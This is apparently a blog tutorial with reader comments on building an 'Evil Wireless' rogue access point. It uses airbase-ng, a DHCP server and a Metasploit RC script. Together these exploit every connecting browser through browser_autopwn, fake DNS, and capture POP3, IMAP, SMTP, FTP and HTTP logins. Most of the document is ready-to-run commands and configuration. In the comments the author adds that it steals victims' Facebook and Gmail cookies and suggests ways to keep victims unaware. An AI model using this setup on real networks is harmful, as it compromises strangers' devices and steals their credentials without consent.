The Evil Access Point!

In this tutorial we are going to create an evil wifi access point! When someone connects to it and uses services like pop3, imap, ftp, smtp, http, https or dns, those services are tested against every exploit in Metasploit Framework 3 that matches them, and each one is tried; when one of them is exploited successfully, a session is opened giving a remote prompt or shell, depending on the system being attacked.
How to configure that evil access point:
* Set your card to monitor mode
* Create the access point using airbase-ng
* Configure the IPs
* Configure the Dynamic Host Configuration Protocol server (dhcpd)
* Change the maximum transfer unit to ~1800
* Run metasploit framework
That's it, so let's start working on it:
* Set your card to monitor mode
To set your card to monitor mode you'll need airmon-ng, a tool that comes with the aircrack-ng suite. If you don't have the suite, download it, compile it and install it:
qnix@~$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
qnix@~$ cd aircrack-ng/
qnix@~/aircrack-ng$ make
qnix@~/aircrack-ng$ make install
Then use airmon-ng to put your wlan0 interface into monitor mode:
qnix@~$ airmon-ng start wlan0
Interface       Chipset         Driver
wlan0           Intel 3945ABG   iwl3945 - [phy0]
                                (monitor mode enabled on mon0)
Done. Our monitor-mode interface is called mon0, and we are going to use it throughout this tutorial.
* Create the access point using airbase-ng:
Now we are going to create a wifi access point using airbase-ng, which we installed as part of the aircrack-ng suite:
qnix@~$ airbase-ng -e "Evil Wireless" -v mon0
11:21:34  Created tap interface at0
11:21:34  Access Point with BSSID 00:**:**:**:**:** started.
That's it, our access point is active and running.
* Configure the IPs
Set the IP address of the at0 interface:
qnix@~$ ifconfig at0 10.0.0.1 netmask 255.255.255.0
* Configure the Dynamic Host Configuration Protocol server (dhcpd):
A DHCP daemon is used to hand out IP addresses and everything related to them (gateway, DNS server, lease times). If you don't have it and you're using a Debian-based system, you can install it from APT:
qnix@~$ apt-get install dhcp3-server
Then we need to create a configuration file for dhcp3 to use, e.g. /etc/dhcp3/evil-wireless.conf:
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
For more information about writing the configuration file, check the manual page of dhcpd.conf:
qnix@~$ man dhcpd.conf
And now we have to run dhcpd with our configuration file:
qnix@~$ dhcpd3 -cf /etc/dhcp3/evil-wireless.conf
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.
Listening on LPF/at0/00:1f:3c:3f:e8:13/10.0.0/24
Sending on   LPF/at0/00:1f:3c:3f:e8:13/10.0.0/24
Sending on   Socket/fallback/fallback-net
* Change the maximum transfer unit to ~1800:
Just type:
qnix@~$ ifconfig mon0 mtu 1800
If you get errors or your card can't change its MTU, try changing the MTU of at0 instead:
qnix@~$ ifconfig at0 mtu 1400
* Run Metasploit Framework:
You have to download Metasploit Framework if you don't have it:
qnix@~$ svn co http://metasploit.com/svn/framework3/trunk msf3
And don't forget to install sqlite3 and ActiveRecord support for Ruby, because we are going to use them to create a sqlite3 database that stores everything:
qnix@~$ gem install activerecord sqlite3-ruby
Now create an RC file for the framework that loads all the commands, so you don't have to type them one by one each time you want to run this:
load db_sqlite3
db_create /root/evilwireless.db
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
Run it and see what happens:
qnix@~$ ./msfconsole -r evilwireless.rc
That's it.
* What happens now?
If anyone searches for a wireless network they'll see "Evil Wireless". If they connect to it they'll get an IP address such as 10.0.0.4, and when they open a browser and go to http://www.google.com/ the Metasploit Framework will test their browser against all the exploits in its database; if one of them succeeds it will give you a session to the user's prompt or shell. Everything is saved in /root/evilwireless.db as a sqlite3 database.
about 1 year ago
I swear, seriously evil. Now whoever uses someone else's internet is going to get taught a lesson, haha ^-^
about 1 year ago
Nice!!
about 1 year ago
Dude, this is great, and props to your blog; it has been just the thing I needed to expand my knowledge in some of these more obscure areas. Great work!!!
I look forward to reading more soon.
about 1 year ago
Thanks a lot, I really appreciate your comments.
Hehe, I don't really get many comments like these!!
Anyway, I am busy with work these days; I will get some free time soon
and I will start writing some new things again!
So check out the blog next time!
about 10 months ago
Nice, nice man, great job, keep it that way.
Just to ask, shouldn't we add some routing rules, like masquerading, to get this stuff working, or is airbase taking care of that? I am asking this because I'm trying to set up a Linux router. My wireless drivers do not support Master mode, but with the aircrack tools setting my wifi card up as an AP is possible.
This is the setup: eth1 with ppp0 is the WAN, eth1 is the wired LAN and wlan0 (in my case at0) is the wireless LAN. To make the wired LAN work I've added some iptables rules. My question is: should I do the same for the wireless LAN? This is out of the scope of this how-to, but if you can, please give me an answer. Thanks in advance. Appreciate and respect to you. Greets
about 9 months ago
@taske
If you want to make that AP accessible to the internet, you must add masquerading rules and other things; just Google "sharing internet connection in Linux" and you'll find what you want, or use a tool like Firestarter for an easy configuration. This technique is not intended to be accessible to the internet; it just tests the whole Metasploit browser database and tries to exploit the victim, and steals the victim's cookies for sites like facebook, gmail, myspace, hi5, etc.
There's a good idea if you want to add internet support: you could make a dynamic evil page that does this technique, so the victim won't notice anything strange about this network. But his browser might freeze! So make sure you choose the options you want correctly.
about 9 months ago
Bookmarked
about 6 months ago
Hello! I am following your guide, but I cannot understand where I have to create the RC file. I cannot understand what the file extension should be and in which directory I should create it. Thanks for your answer!